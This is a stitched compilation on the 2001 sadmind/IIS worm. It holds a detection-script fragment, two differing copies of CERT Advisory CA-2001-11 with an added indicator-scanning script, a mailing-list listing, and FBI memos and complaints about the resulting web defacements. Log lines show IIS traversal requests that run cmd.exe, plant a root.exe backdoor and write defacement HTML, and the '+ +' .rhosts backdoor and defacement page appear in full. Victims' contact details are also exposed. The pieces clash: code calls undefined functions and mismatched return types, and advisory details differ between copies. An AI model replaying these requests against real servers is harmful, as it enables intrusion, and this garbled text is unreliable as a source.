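# Constructed sample data modelled on the advisory's excerpts (not real logs).
IIS_LOG_SAMPLE = r"""#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<html>defaced</html>>.././index.asp 502
2001-05-06 12:21:03 192.0.2.7 - 10.20.20.20 80 GET /index.asp - 200
"""
SYSLOG_SAMPLE = """May  7 02:40:01 carrier.example.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May  7 02:40:06 carrier.example.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May  7 02:40:08 carrier.example.com inetd[139]: /usr/sbin/sadmind: Hangup
"""
PS_SAMPLE = """  PID TTY      TIME CMD
  120 ?        0:00 /usr/sbin/inetd -s
  482 ?        0:00 /bin/sh /dev/cuc/sadmin.sh
  491 ?        0:01 /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  503 ?        0:00 /usr/sbin/inetd -s /tmp/.f
"""
NETSTAT_SAMPLE = """      *.600                *.*                0      0 24576      0 LISTEN
      *.111                *.*                0      0 24576      0 LISTEN
"""
RHOSTS_SAMPLE = "+ +\n"

if __name__ == "__main__":
    for ip, stages in scan_iis_log(IIS_LOG_SAMPLE).items():
        print(ip, "->", ", ".join(stages))
    for item in solaris_indicators(SYSLOG_SAMPLE, PS_SAMPLE, NETSTAT_SAMPLE, RHOSTS_SAMPLE):
        print("solaris:", item)
```

Run it directly to print the findings for the constructed data. The 502s on the copy and echo lines in the advisory are what IIS returns when cmd.exe produces no CGI headers; the command has still executed, which is why the classifier keys on the request path and arguments rather than on the status code. The legitimate inetd entry in the ps sample is not flagged because the worm's copy is distinguished by its /tmp/.f configuration file, not by the program name.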


II. Impact


Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems
compromised by this worm can suffer modified web content.


Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris
systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems.


We are receiving reports of other activity, including one report of files being destroyed on the compromised systems, rendering
them unbootable. It is unclear at this time if this activity is directly related to this worm.


III. Solutions


Apply a patch from your vendor
A patch is available from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp


For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
For IIS Version 5:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp


Additional advice on securing IIS web servers is available from


http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191:


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=


Appendix A. Vendor Information 


Microsoft Corporation

The following documents regarding this vulnerability are available from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

Sun Microsystems

Sun has issued the following bulletin for this vulnerability:


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=


References


1. Vulnerability Note VU#111677: Microsoft IIS 4.0/5.0 vulnerable to directory traversal via


http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind


http://www.cert.org/advisories/CA-1999-16.html


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, J


This document is available from: http://www.cert.org/advisories/CA-2001-11.html


CERT/CC Contact Information


Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)


Fax: +1 412-268-6989 

Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies
during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from


http://www.cert.org/CERT_PGP.key


If you prefer to use DES, please call the CERT hotline for more information. 


Getting security information 


CERT publications and other security information are available from our web site


http://www.cert.org/


To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. In the body of the
message, type


subscribe cert-advisory


* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.


NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis.
Carnegie Mellon University makes no warranties of any kind, either expressed or implied, as to any matter including, but not
limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material.
Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright
infringement.


Conditions for use, disclaimers, and sponsorship information 


Copyright 2001 Carnegie Mellon University. 


Revision History 


May 08, 2001: Initial Release 

May 08, 2001: Formatting change to improve printing 

May 08, 2001: Correct link in the vendor section to point to the correct Microsoft Bulletin. 
May 10, 2001: Changed sanitized logs to example.com 
CERT Advisory CA-2001-11 sadmind/IIS Worm


Original release date: May 08, 2001 
Last revised: -- 
Source: CERT/CC 


A complete revision history is at the end of this file. 
Systems Affected 


* Systems running unpatched versions of Microsoft IIS 
* Systems running unpatched versions of Solaris up to, and 
including, Solaris 7 


Overview 


The CERT/CC has received reports of a new piece of 
self-propagating 

malicious code (referred to here as the sadmind/IIS worm). The 
worm 

uses two well-known vulnerabilities to compromise systems and 
deface 

web pages. 


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a 

vulnerability in Solaris systems and subsequently installs 
software to 

attack Microsoft IIS web servers. In addition, it includes a 
component 

to propagate itself automatically to other vulnerable Solaris 
systems. 

It will add "+ +" to the .rhosts file in the root user’s home 

directory. Finally, it will modify the index.html on the host 
Solaris 

system after compromising 2,000 IIS systems. 


To compromise the Solaris systems, the worm takes advantage of 
a 

two-year-old buffer overflow vulnerability in the Solstice 
sadmind 

program. For more information on this vulnerability, see 


http: //www.kb.cert.org/vuls/id/28934 
http: //www.cert..org/advisories/CA-1999-16.html 


After successfully compromising the Solaris systems, it uses a 
seven-month-old vulnerability to compromise the IIS systems. 
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For 
additional information about this vulnerability, see 


http: //www.kb.cert.org/vuls/id/111677 


Solaris systems that are successfully compromised via the worm exhibit the following characteristics:

  * Sample syslog entry from compromised Solaris system

      May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
      May 7 02:40:01 carrier.domain.com last message repeated 1 time
      May 7 02:40:03 carrier.domain.com last message repeated 1 time
      May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
      May 7 02:40:03 carrier.domain.com last message repeated 1 time
      May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
      May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
      May 7 02:40:08 carrier.domain.com last message repeated 1 time
      May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed

  * A rootshell listening on TCP port 600

  * Existence of the directories

      /dev/cub contains logs of compromised machines
      /dev/cuc contains tools that the worm uses to operate and propagate

  * Running processes of the scripts associated with the worm, such as the following:

      /bin/sh /dev/cuc/sadmin.sh
      /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
      /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
      /bin/sh /dev/cuc/uniattack.sh
      /bin/sh /dev/cuc/time.sh
      /usr/sbin/inetd -s /tmp/.f
      /bin/sleep 300


Microsoft IIS servers that are successfully compromised exhibit the following characteristics:

  * Modified web pages that read as follows:

      fuck USA Government
      fuck PoizonBOx
      contact: sysadmcn@yahoo.com.cn

  * Sample Log from Attacked IIS Server

      2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
      2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
      2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
      2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
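The Solaris host characteristics and the IIS log sample above can be turned directly into a triage check. The following Python script is an added example written for this page, not CERT/CC code: it applies the advisory's indicators (inetd reporting sadmind crashes, the /dev/cub and /dev/cuc staging directories and worm scripts, a listener on TCP 600, and the cmd.exe traversal, root.exe copy and echo-to-index.asp request sequence) to constructed sample syslog, ps, netstat and IIS W3C extended log lines. The overlong-UTF-8 normalisation in decode_uri goes beyond the already-decoded log sample on the page so that requests logged in the encoded form VU#111677 describes are caught as well. All sample lines are constructed and every function name is this example's own.

```python
# Indicator scan for the sadmind/IIS worm as described in CA-2001-11.
# Added example, not CERT/CC code; all sample lines below are constructed.
import re
from urllib.parse import unquote

# inetd logging sadmind dying is the footprint of the CA-1999-16 overflow.
SADMIND_CRASH = re.compile(
    r"inetd\[\d+\]: /usr/sbin/sadmind: (Bus Error|Segmentation Fault|Hangup|Killed)")
# Staging directories, scripts and the alternate inetd config the worm leaves.
WORM_MARKERS = ("/dev/cub", "/dev/cuc", "/tmp/.f",
                "sadmin.sh", "uniattack.sh", "time.sh", "grabbb")
ROOTSHELL_PORT = 600
# Overlong UTF-8 forms of "/" and "\" that unpatched IIS (VU#111677) accepted
# in a URL; normalising them makes either spelling of the traversal read "..".
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}

def scan_syslog(lines):
    """Return syslog lines in which inetd reports sadmind crashing."""
    return [ln for ln in lines if SADMIND_CRASH.search(ln)]

def scan_processes(ps_lines):
    """Return ps lines referencing the worm's staging paths or scripts."""
    return [ln for ln in ps_lines if any(m in ln for m in WORM_MARKERS)]

def scan_listeners(netstat_lines, port=ROOTSHELL_PORT):
    """Return 'netstat -an' lines with a TCP listener on the root-shell port."""
    hits = []
    for ln in netstat_lines:
        f = ln.split()
        if len(f) >= 2 and f[-1] == "LISTEN" and f[0].endswith(".%d" % port):
            hits.append(ln)
    return hits

def decode_uri(stem):
    """Normalise a cs-uri-stem field to a lower-case, forward-slash path."""
    s = stem.lower()
    for enc, ch in OVERLONG.items():
        s = s.replace(enc, ch)
    return unquote(s).replace("\\", "/")

def classify_iis_request(line):
    """Label one W3C extended log line (date time c-ip user s-ip port method
    uri-stem uri-query status ...) or return None if it looks benign."""
    fields = line.split()
    if len(fields) < 9:
        return None
    stem = decode_uri(fields[7])
    query = unquote(fields[8]).replace("+", " ").lower()
    traversal = "/../" in stem and stem.endswith("cmd.exe")
    via_backdoor = stem.endswith("/root.exe")   # the worm's copy of cmd.exe
    if not (traversal or via_backdoor):
        return None
    if "copy" in query and "root.exe" in query:
        return "stage-backdoor"                  # cmd.exe copied into /scripts
    if "echo" in query and (".asp" in query or ".htm" in query):
        return "deface"                          # page content being rewritten
    return "backdoor" if via_backdoor else "traversal"

def scan_iis_log(lines):
    """Return (line number, label, client IP) for every flagged request."""
    out = []
    for n, ln in enumerate(lines, 1):
        label = classify_iis_request(ln)
        if label:
            out.append((n, label, ln.split()[2]))
    return out

# Constructed sample data, not captured from any real host.
SAMPLE_SYSLOG = [
    "May  7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped",
    "May  7 02:40:01 carrier.domain.com last message repeated 1 time",
    "May  7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped",
    "May  7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup",
    "May  7 02:41:00 carrier.domain.com sshd[201]: Accepted publickey for admin",
]
SAMPLE_PS = [
    "root 312   1 0 02:40 ? /bin/sh /dev/cuc/sadmin.sh",
    "root 318 312 0 02:40 ? /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111",
    "root 140   1 0 02:40 ? /usr/sbin/inetd -s /tmp/.f",
    "root 139   1 0 Jan01 ? /usr/sbin/inetd -s",
]
SAMPLE_NETSTAT = [
    "*.600   *.*  0 0 24576 0 LISTEN",
    "*.6000  *.*  0 0 24576 0 LISTEN",
    "10.1.1.5.600  10.9.9.9.3321  8760 0 24820 0 ESTABLISHED",
]
SAMPLE_IIS = [
    "2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -",
    r"2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -",
    "2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML>.././index.asp 502 -",
    "2001-05-06 12:21:04 10.30.30.30 - 10.20.20.20 80 GET /default.htm - 200 -",
]

if __name__ == "__main__":
    print("sadmind crashes:", len(scan_syslog(SAMPLE_SYSLOG)))
    print("worm processes:", scan_processes(SAMPLE_PS))
    print("root-shell listeners:", scan_listeners(SAMPLE_NETSTAT))
    for n, label, ip in scan_iis_log(SAMPLE_IIS):
        print("IIS line %d: %s from %s" % (n, label, ip))
```

The IIS classifier keys on the request stem and the command carried in the query string rather than on the HTTP status, because the page's own sample shows the staging and defacement requests returning 502 while the first traversal returns 200; the three labels (traversal, stage-backdoor, deface) map to the three steps the sample log shows.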


II. Impact

Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems compromised by this worm can suffer modified web content.

Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems.

We are receiving reports of other activity, including one report of files being destroyed on the compromised Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this worm.
III. Solutions

Apply a patch from your vendor

A patch is available from Microsoft at

  http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

For IIS Version 4:

  http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

For IIS Version 5:

  http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Additional advice on securing IIS web servers is available from

  http://www.microsoft.com/technet/security/iis5chk.asp
  http://www.microsoft.com/technet/security/tools.asp

Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191:

  http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


Appendix A. Vendor Information

Microsoft Corporation

The following documents regarding this vulnerability are available from Microsoft:

  http://www.microsoft.com/technet/security/bulletin/MS01-023.as

Sun Microsystems

Sun has issued the following bulletin for this vulnerability:

  http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


References

  1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode in url (MS00-078)
     http://www.kb.cert.org/vuls/id/111677
  2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
     http://www.cert.org/advisories/CA-1999-16.html

Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer

This document is available from:
  http://www.cert.org/advisories/CA-2001-11.html


CERT/CC Contact Information 


Email: cert@cert.org 
Phone: +1 412-268-7090 (24-hour hotline) 
Fax: +1 412-268-6989 
Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

  http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.


Getting security information 


CERT publications and other security information are available from our web site

  http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

  subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.


NO WARRANTY 

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.


Conditions for use, disclaimers, and sponsorship information 
Copyright 2001 Carnegie Mellon University. 


Revision History 
May 08, 2001: Initial Release 


Subscription/unsubscription/info requests: send e-mail with "subscribe", "unsubscribe", or "info" on the first line of the message body to discuss-request@blu.org (Subject line is ignored).

Partial thread listing:
  * CERT Advisory CA-2001-11, Brian Bay
    * Kris Loranger
  * [Fwd: Re: CERT Advisory CA-2001-11], Brian Bay
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE                    Date: 06/01/2001
To: Chicago          Attn: [____]                        b3
    Counterterrorism                                      b6
                                                          b7C
From: Seattle                                             b7E
      Squad 11
      Contact: (206) 262-2438


Approved 
Drafted By: 


Case ID #3 


Title: HACKER/HONKER UNION OF CHINA;
       ILLINOIS SECRETARY OF STATE-VICTIM
       INTRUSION
       04/03/2001


Synopsis: Report Seattle Division Web Page Defacements 


Enclosure(s): Enclosed for receiving office, copies of (1) FD-71 
complaint, (1) NIPC report, (1) victim log file documenting a web 
page defacement, and (1) FD-801. 


Details: During the month of May 2001, several companies in Seattle Division territory were the victim of web page defacements as a consequence of their receipt of the sadmind/IIS worm. The web page defacements contained identical anti-US Government language and disparaging remarks about PoisonBox.


The following is a list of known victim companies 
located within the Seattle Division along with their contact 
information: 


— a amenanae of Xeta echnodosies.| | se 


Lummi Indian Business Council, 
2616 Kwina Road, Bellingham, 
Washington, 98226, 


US Network Services, 


[illegible] 272 East, Suite 200, Seattle,
Washington,


b3 
b7E 


To: Chicago   From: Seattle
Re: 06/01/2001                                                      b3


b7E 


Solid Vertical Domains, Ltd., PMB 624, 11410 NE 124th 
Street, Kirkland, Washington, 98034-4305, (425) 488- 
0378. 


Chicago is encouraged to directly contact the above 
victims if further questions arise. As this case is being 
handled on a national basis by Chicago Division, Seattle Division 
will not open any additional cases relative to these incidents. 


To: Chicago   From: Seattle


b7E 
LEAD (s) : 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, IL
Take action deemed appropriate. 
Set Lead 2: (Adm) 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
b6
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE                    Date: 06/13/2001
To: Chicago          Attn: Squad [____]
                           SA [____]                             b3
                                                                 b6
From: Washington Field                                           b7C
      NS-18, NVRA                                                b7E
      Contact: SA [____] (703) 762-3834


Approved By: 


Drafted By: 


Case ID #: (Pending) 


Title: Subject: Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To report results of covered lead. 


b6 
Enclosure(s): One copy of FD-302 dated 06/13/2001.                 b6
                                                                   b7E

Details: On 06/13/2001, SA [____] spoke with [____], United States Department of Commerce, to obtain log files for the two servers [illegible] "Battle"; both machines did not have logging enabled and therefore there are no logs for the computer intrusions. [____] for ESA's webserver (FNS) and TA's TAserver4.

Attached to this EC is a FD-302 containing information given to SA [____] by a WFO source concerning PoizonBOx/Honker's Union of China.                                  b6
                                                                   b7C
b3 


lo 7E 


To: Chicago   From: Washington Field
ret [6/22/2004 


LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 


Read and clear. 




b3 
b7 
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 06/01/2001

On May 14, 2001, [____], City of St. Louis, faxed some computer logs and an E-mail message to [____], Assistant InfraGard Coordinator, Federal Bureau of Investigation (FBI), about a web defacement at the Water Division's Headquarters, 1640 South Kingshighway, St. Louis, Missouri, 63110.


The E-mail message, which was faxed along with the computer logs and an article on web defacements, stated that [____], City of St. Louis Water Division, had talked to [____] about a web page defacement on Tuesday, May 8, 2001. [____] had noticed that the City of St. Louis Water Division's web page had been defaced and had a black screen. After viewing the website, [____] reviewed his firewall logs and located two HTML files and two .asp files that were time stamped at 4:32 pm on Monday, May 7, 2001. The .asp files were unknown to [____].

The HTML text revealed what message was supposed to have displayed on the screen. The message was supposed to read, "fuck USA Government, fuck PoizonBOx, contact sysadmcn@yahoo.com.cn".

[____] opined that the text was not printed on the screen, because the Water Division does not use Outlook to run its web pages or E-mail.


Investigation on 05/14/2001 at St. Louis, Missouri

File [____]   Date dictated 05/18/2001


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 06/11/2001

On May 17, 2001, Special Agent (SA) [____], Federal Bureau of Investigation (FBI), St. Louis Division, met with [____], City of St. Louis Water Division, at his office to discuss information about a web defacement which had been faxed to the St. Louis Division. [____] advised that there had been no further incidents of web defacement to the system.

[____] both checked the file transfer protocol (FTP), and determined that it was not in service. [____] was concerned as to how the web defacement took place since the firewall logs do not show any type of activity.


[____], with the City of St. Louis Water Division, told [____] that he had viewed the City of St. Louis City Hall's web site and they also had a black screen. [____] was aware that the City Hall used GroupWise rather than Outlook, which might further explain and confirm that Outlook was needed to view the text of the message from the hackers.


[____] advised SA [____] that after he located an article about the web defacement of the University of Missouri St. Louis' website, which had the exact same text, he assumed that it was the same script.

[____] had addressed the web defacement and wanted to make the St. Louis Division aware of it because other victims had been contacting the FBI.

Investigation on 05/17/2001 at St. Louis, Missouri

Date dictated 05/18/2001

by SA [____]
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 06/01/2001

[____], St. Louis Bridge Company, 655 Landmark Drive, Arnold, Missouri, 63010, telephone number [____], was contacted by Special Agent (SA) [____], Federal Bureau of Investigation, St. Louis Division, at his office. After being advised of the identity of the interviewing Agent, [____] provided the following information:

[____] had completed and submitted a cyber threat and computer intrusion incident report to the National Infrastructure Protection Center (NIPC), Washington, D.C. The NIPC Watch and Warning Unit then forwarded the report to the St. Louis Division. SA [____] contacted [____] to set up an interview about the incident.


On May 17, 2001, SA [____] met with [____] to discuss the intrusion incident. The web defacement was of the intranet, which concerned [____] since most intranets are not normally affected by an outside attacker. [____] believed that the attack took place as part of a File Transfer Protocol (FTP).

SA [____] then reviewed the incident report which Blase had filled out. [____] had advised that the sadmind/IIS worm was responsible for the defacement on the internal website.

[____] had provided a copy of the defaced website which SA [____] was familiar with from other web defacements. The message was "fuck USA Government, fuck PoizonBOx, contact: sysadmcn@yahoo.com.cn".

[____] provided SA [____] with a zip disk containing the logs as well as the numerous IP addresses associated with the attack. [____] also provided SA [____] with several documents of his IP address queries at www.apnic.net.

The server which was attacked contained banking information of St. Louis Bridge, bidding documents on projects, and employee data to include names, addresses, and telephone numbers. The main server attacked crashed from the intrusion. There was an attempt in the script written by the attackers to destroy the hard drive. User accounts to the system had also been deleted.

[____] had been able to bring the network back on-line with


Investigation on 05/17/2001 at St. Louis, Missouri


Date dictated 05/23/2001 
intrusion evaluation software. [____] had a more current version of the network intrusion evaluation software, but had not installed it prior to the attack.

[____] provided five IP addresses that he located in the logs; their purposes in the attack are as follows:


On May 2, 2001, 210.83.109.119 ran a cmd.exe for 
command executable script on the system. 


On May 2, 2001, IP address 62.226.241.1 caused the crash of the network server.


On May 2, 2001, IP address 202.108.18.5 was uploading 
to the server looking for passwords. 


On May 4, 2001, IP address 211.159.23.170 was also 
running scripts on the network server. 


On May 5, IP address 202.97.205.4 ran attack scripts on 
Blase’s network system. 


[____] had drafted a letter explaining the attack and included it with the incident report forwarded to the NIPC Watch Center.

After reviewing his system, [____] discovered the very first intrusion into the system was on March 24, 2001. [____] then noticed another intrusion into the system on April 7, 2001. The attack took place in the month of May 2001.

[____] was able to locate a back door program written by the attacker for re-entrance into the system. The program was named Kaitenz. [____] used a back up tape to help recover his server and the back up of the system caused some of the information to be lost. [____] advised that the assessment as far as monetary damage was in the range of $3,000.00 to $5,000.00.
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE                    Date: 05/30/2001
To: Chicago          Attn: SA [____]
    Counterterrorism


From: New York 
C-37 
Contact: SA 


212-384-4039 
Approved By: 
Drafted By: 


Case ID #: 


(Pending)


Title: HACKER HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
IP/C 
00:CG 


Synopsis: To advise of New York action on captioned matter. 
Administrative: Reference telephone call between SA [____] and SA [____] on 05/07/2001. Reference telephone call between SSA [____] [____] on 05/30/01. Reference EC from Chicago dated 05/12/01.


Details: All victims in captioned case were dealt with 
telephonically, and instructed to maintain a copy of all relevant 
logs concerning the web defacement incidents. The victims were 
advised that they may be contacted by the Chicago office in the 
future if deemed necessary. The New York Office provided the 
contact information to Chicago for this purpose. 


The New York Office is advising Chicago that it sees no issue 
with the Chicago Case Agent contacting the victims directly at 
this early investigative stage. Should this case eventually be 
prosecuted and chain of custody becomes an issue, the New York 
Office will then assist Chicago as necessary by retrieving any 
other evidence from victim companies. 


New York considers this matter RUC. 


FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE                    Date: 06/13/2001

To: Chicago          Attn: SA [____]
                           (312) 431-1333


From: San Francisco 
14B/Hayward RA 
Contact: SA 


(510) 886-7447 
Approved By: 
Drafted By: 
Case ID #: 
Title: Honkers Union of China 


Synopsis: Forward materials from victims in the San Francisco Division of web defacements originating in China.

Reference: GroupWise e-mail from [____] to NIPC Supv. [____], dated May 2, 2001, 7:07 AM, Subject: Honkers Union of China [____], signed SSA [____], NIPC Computer Investigations Unit.

Enclosures: Ten (10) victim information documents.

Details: The San Francisco Division is forwarding the enclosed victim information/materials to the Chicago Division, case file [____]. The materials include FD-71's, e-mails, and NIPC Watch Reports from victim companies. In some cases, logs, copies of the defacement, and other information provided by the victims are provided.


The San Francisco Division will continue to forward 
victims/information as necessary. 


If there are any questions or comments, contact SA [____], Hayward RA, (510) 886-7447.
To: Chicago   From: San Francisco
Re: [____] 06/13/2001

LEAD(s):
Set Lead 1:
CHICAGO
AT CHICAGO

Read and Clear
Subject: Description of computer attack

Elements of Crime

My web server was contacted by the IP 202.97.205.3 and a known exploit was used against us to install a rootkit known as Backgate http://www.sans.org/y2k/unicode.htm.

Our web site was defaced, but no permanent damage was done. I have cleaned up the mess and patched our server to prevent future break-ins.

Please contact me for any further assistance and also keep me updated to the status of the investigation.

Proact                                                              b7C
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below

Subject's name and aliases              Character of case

UNSUB(S)                                Computer Intrusion

Complainant                             [ ] Protect Source

Complaint received

[ ] Personal [ ] Telephonic   Date 05-17-2001   Time 11:4[illegible] am

Address of Subject                      Complainant's address and telephone number

INTERNET PROVIDER address               1186 Cielo Circle
"IP" 202.204.113.13                     Rohnert Park, CA 94925


Scars, marks and other data 


Subject’s 
Description 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint

[____] of The Fairy Company.com, from which he and his [____] sell fairy figures. On Friday, May 10, 2001, [____] business experienced an interruption of service at their website. Apparently someone "hacked into" the website and altered the screen to solid red. The interruption continued for 9 days. On Wednesday, May 10, 2001 at approximately 8:14 pm, [____] company experienced another interruption of service. Once again the screen was red and it contained the words "fuck the US Government".

[____] explained that he determined that the hacker utilized IP address 202.204.113.13 to access the Internet and hack into his business website.


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


Web site hacking

From: [____]
To: [____]
Date: Thu, May 17, 2001 12:02 AM
Subject: Web site hacking

[____] dba Jacobs Farm del Cabo, Stageroad, Pescadero, CA, phone # 650-879-2239      b6
                                                                                    b7C

(south of Half Moon Bay) called to state that his web site server has been attacked three times in the last couple of days with someone placing on his web site the following message:

"fuck U.S.A. government"

[____] has the logs and [____] has been able to bypass his firewall through the web site servers.

Good Luck on another one.


From: [____]
Sent: Thursday, May 17, 2001 10:12 AM
To: 'nccs-sf@fbi.gov'
Subject: [____]

This web page was placed on our MS Exchange Web server. We believe that they entered from the port 80 service on our firewall and got to this server. They left behind Firedaemon.exe, sud.exe and newgina.dll. Our research showed that they were capturing ID's and passwords. Then they left this message on the mail web server. The following is the html and a screen print. I did not want to take the chance that I might spread it even more. If you would like the original file I can send it.

We are removing all traces and heightening our security. If I help in any

<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

<<...OLE_Obj...>>


Color Spot Nurseries 
fuck USA Government
fuck PoizonBOx


contact:sysadmcn@yahoo.com.cn 
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below

Subject's name and aliases              Character of case

UNSUB(S)                                Website Defacement
Honker Union Of China


Complainant                             [ ] Protect Source


b6 
b7c 


Complaint received 


[ ] Personal [X] Telephonic   Date 05/14/2001   Time 10:45 A

Address of Subject                      Complainant's address and telephone number


Complainant's DOB 


Scars, marks and other data 


Employer Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


